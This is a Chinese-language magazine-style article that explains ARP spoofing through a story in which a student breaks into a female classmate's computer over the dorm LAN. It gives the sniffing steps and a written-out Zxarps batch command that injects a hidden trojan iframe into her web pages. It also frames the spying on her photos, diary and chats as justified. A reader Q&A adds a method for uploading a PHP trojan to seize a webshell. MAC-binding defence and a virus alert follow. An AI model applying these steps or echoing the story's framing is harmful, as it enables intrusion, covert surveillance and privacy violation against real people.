什麼是arp欺騙

　　什麼是arp欺騙？先來看個故事吧。
        開學了，無視那些校園裡的談情說愛，我繼續我的黑客學習，在網絡中找尋到挑戰的快感。但是就在昨天，一個偶然的擦肩而過激活了我的荷爾蒙。她是那麼的美麗，在飄滿飯菜味的食堂中我仍然隱約地聞到了與她擦肩而過時飄來的淡淡茉莉香。她是誰？以前怎麼沒見過？
　　雖然宿捨的弟兄們一直嘲笑我是故意的，但我仍然認為是上帝的手推了我一把。我拿起飯盒從座位上站起來繞過她身邊的那一刻，僅僅是想看看她桌子上的課本封皮，好確認她學的是什麼專業。但是不知道哪個該死的，把一碗黏糊糊的粥灑在了地上，無意中踩到，我很英俊地摔倒了，飯盆和裡面的剩菜以標准的拋物線落在她的脖子上。
　　隨後事情的發展進度超出了我的想象力，我們很快地就交換了姓名、專業、宿捨號碼等私人信息，當然最後她也告訴我，她身上穿的那個印著卡通熊的衣服叫TeenieWeenie，一周前她父親買給她的，價值2180元……唉，女人的衣服……怎麼這麼貴？
　　不管怎麼樣，我現在都是負資產了，信用卡嚴重透支，雖然我知道了她的宿捨號碼和姓名，但是價格也太貴了點兒吧。於是我決定，通過宿捨樓局域網，入侵她的電腦，將木馬植入到她的電腦中，翻看她的照片，偷看她的日記，監視她的QQ，我太壞了。TW.WInGWIT.cOm不過想想那2180元，我認為我有這個權利！
　　我坐在電腦前思索了許久，最終我決定用ARP欺騙敲開她電腦的大門。ARP是一種地址解析協議，該協議用來解決一個節點上的下一跳IP地址到MAC地址的轉換。ARP欺騙就是截獲網關數據或者偽造網關發送虛假數據的技術，以達到制造網絡通訊混亂的目的。
局域網中尋找她
　　幾經努力，我得知她宿捨的幾台電腦都是一個人幫忙配的，電腦名稱默認設置的是宿捨門號加姓名拼音。於是，我准備用網絡監控軟件Active Wall（軟件下載地址：http://www.cpcw.com/bzsoft）嗅探她的位置。
　　軟件啟動後，自動掃描嗅探出了局域網所有電腦，主界面中還會顯示出每台電腦的名字和發送接收字節的多少（圖1）。根據“電腦名稱”找到了正在上網的她。

偷看她的上網記錄
　　我決定攔截她的訪問信息，看看她上網都干了什麼。點擊“分組管理”中的“策略配置”，選擇“HTTP過濾”選項。在新彈出的“HTTP過濾配置”對話框的“網址”頁面中輸入“*”號，接著在“策略規則”選項中選擇“通過並記錄”（圖2）。

　　我之所以不在網址一欄中輸入具體的網址，是因為用“*”號通配符可以知道她訪問的所有網站，而不會局限於某個網站。20分鐘後嗅探出的所有內容顯示在“事件記錄”中，我將嗅探出的網址日志復制導出，對她的浏覽習慣進行了大致的分析，在這段時間裡她先後登錄了學校教務網站、新浪博客、Qzone、某時尚雜志網等。
成功掌控她的電腦
　　想要利用ARP欺騙實現在她的電腦中植入木馬的目的，僅僅通過Active Wall嗅探是無法實現的。真正的戰斗必須准備幾樣專業的ARP欺騙工具，分別是網絡訪問系統工具Winpcap、ARP欺騙工具Zxarps、網頁木馬。
　　然後我打開Windows自帶的記事本，在記事本中寫入“zxarps.exe -idx 0 -ip 192.168.1.8-192.168.1.11（需要欺騙的IP地址段，根據實際情況修改）-port 80 -insert " ＜iframe src='網頁木馬地址' width=0 height=0＞" ”，再點擊記事本的“另存為”，將內容另存為.bat格式的文件，並將該文件與Zxarps保存在同一個目錄中。
　　批處理運行後，Zxarps迅速將＜iframe src='網頁木馬地址' width=0 height=0＞這段代碼插入到指定的遠程電腦浏覽的每一個網頁中（圖3）。十五分鐘之後，標有她名字的電腦出現在我的木馬監控端中。也許從我和她相遇的那一刻起一切都是偶然，但是我相信，所謂偶然，只不過是我們對復雜的命運的無知罷了……

巧妙抵御ARP欺騙攻擊
　　從去年開始，ARP欺騙攻擊就開始流行起來。要防御這種攻擊，我們可以使用MAC綁定法來解決問題。首先在命令提示符下輸入“Ipconfig/all”，然後繼續在命令提示符下輸入命令“ARP -s IP MAC”，就可以將MAC地址和IP地址捆綁在一起了。
　　這樣，就不會出現IP地址被盜用，不能正常使用校園網的情況了，從而有效保證電腦的安全。不過對於某些IP地址不固定的校園網來說，最好的方法仍然是使用專業的ARP防欺騙軟件，例如AntiArp（軟件下載地址：http://www.cpcw.com/bzsoft）。
回音壁
　　讀者 汪冰：看過上期的《買論壇點券“附送”管理員權限》之後，我成功地進入了網站的管理後台，但是我在嘗試取得WebShell的控制權時總是沒有辦法成功，請問要取得WebShell的控制權有什麼訣竅？
　　小新分析：在某些支持PHP環境的服務器中，可以通過修改“論壇博客”模塊中的文件設置，將PHP作為新後綴添加上，然後再通過Blog文章發布功能將你的PHP木馬上傳就可以了。這種奪取WebShell的控制權的方法要求對方的服務器必須是支持ASP和PHP兩種解析方式的服務器。
一周病毒焦點：線上游戲竊取者變種竟會關閉揚聲器
　　警惕程度：★★★
　　危害指數：★★★
　　瑞星監測網監測到線上游戲竊取者變種LUF（Trojan.PSW.Win32.GameOL.luf）病毒在網絡上大肆傳播。它是一個用VC語言編寫的木馬。運行後，首先將系統的揚聲器設置成靜音，避免殺毒軟件和安全工具發出警告聲響，並試圖關閉多種主流殺毒軟件和安全工具。
　　然後它將自身復制到系統目錄下，修改注冊表啟動項實現開機自啟動。同時，還會加載到所有進程中，在後台監視和竊取用戶網游賬號、密碼等信息，並發送到黑客指定的郵箱使玩家蒙受損失。
　　清除方法：使用最新病毒庫的殺毒軟件查殺，例如瑞星的病毒庫要升級到20.35版。此外，我們可以使用能保護網游賬號和密碼的一些專用工具，防止它們被病毒竊取。

 
From:http://tw.wingwit.com/Article/Network/201309/359.html